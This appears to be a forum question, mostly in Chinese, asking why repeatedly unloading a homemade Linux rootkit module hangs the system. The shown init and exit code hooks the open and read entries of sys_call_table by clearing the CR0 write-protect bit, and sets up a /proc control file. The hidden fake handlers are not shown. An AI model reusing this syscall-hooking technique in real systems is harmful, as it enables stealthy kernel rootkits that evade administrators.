rmmod
有时会使系统挂起，除此之外它运行良好
在一个终端运行中:
for i in `seq 1000`; do insmod mhrootkit.ko; sync; rmmod mhrootkit; done
然后在另一个终端运行:
dmesg
然后系统挂起。我想可能存在竞态条件。这是一段代码:
/*
 * Module entry point.
 *
 * Locates sys_call_table via get_sys_call_table() (defined elsewhere in
 * the module), saves the current open/read entries into ori_sys_open and
 * ori_sys_read, overwrites them with fake_open/fake_read, and creates the
 * "mhctl" proc file.
 *
 * Returns -1 when the table cannot be found; otherwise 0, even if
 * proc_create() fails (that case is only logged, procf stays NULL).
 *
 * Nothing in this function coordinates with tasks that may already be
 * inside a system call, and the table writes are plain stores; the
 * matching unhook in mhrootkit_exit() is where the hang reported on this
 * page is suspected to originate.  From a defender's point of view, a
 * sys_call_table entry that no longer points at the kernel's own
 * sys_open/sys_read, and a module that toggles CR0 directly, are the
 * classic artifacts kernel integrity checkers compare against.
 */
int __init mhrootkit_init(void) {
unsigned long cr0;
printk(KERN_INFO "Mahua rootkit init\n");
sys_call_table = get_sys_call_table();
if (!sys_call_table)
return -1; /* plain -1 rather than a -errno value; callers see a failed load */
/* hook */
/* Clear bit 16 of CR0 (the x86 WP bit), presumably so the otherwise
 * read-only page holding the table can be written; the original value
 * is restored below.  Between the two writes the CPU runs with WP off. */
cr0 = read_cr0();
write_cr0(cr0 & ~0x10000);
/* open */
ori_sys_open = (open_func)sys_call_table[__NR_open];
sys_call_table[__NR_open] = (unsigned long*)fake_open;
/* read */
ori_sys_read = (read_func)sys_call_table[__NR_read];
sys_call_table[__NR_read] = (unsigned long*)fake_read;
write_cr0(cr0);
/* hook end */
/* create proc file */
/* 0600: owner read/write only; fops is the file_operations defined elsewhere */
procf = proc_create("mhctl", 0600, NULL, &fops);
if (!procf)
printk("create proc file failed\n"); /* no KERN_* level, so it logs at the default level */
return 0;
}
/*
 * Module exit point.
 *
 * Writes the entries saved by mhrootkit_init() (ori_sys_open,
 * ori_sys_read) back into sys_call_table and removes the "mhctl" proc
 * file.  The table stores are immediately followed by the module being
 * unloaded; there is no wait for tasks that already fetched
 * fake_open/fake_read from the table and are still executing them, which
 * matches the dangling-pointer theory stated in the question below.
 */
void __exit mhrootkit_exit(void) {
unsigned long cr0;
printk(KERN_INFO "Mahua rootkit exit\n");
/* restore hook */
/* Same CR0 bit-16 (WP) dance as in init: clear, write the table, restore. */
cr0 = read_cr0();
write_cr0(cr0 & ~0x10000);
sys_call_table[__NR_open] = (unsigned long*)ori_sys_open;
sys_call_table[__NR_read] = (unsigned long*)ori_sys_read;
write_cr0(cr0);
/* remove proc file */
/* procf may be NULL if proc_create() failed in init; proc_remove() is called regardless */
proc_remove(procf);
}
硬件:Vmware Workstation 12 Player
操作系统:CentOS 7.2.1511
我认为问题在于：当我在模块退出时恢复系统调用表项时，'某人'可能仍持有指向 fake_open/fake_read 的野指针。于是我添加了一个原子计数器来对 open 和 read 操作做引用计数。但系统仍然会挂起，没有任何改善。有人有什么想法吗?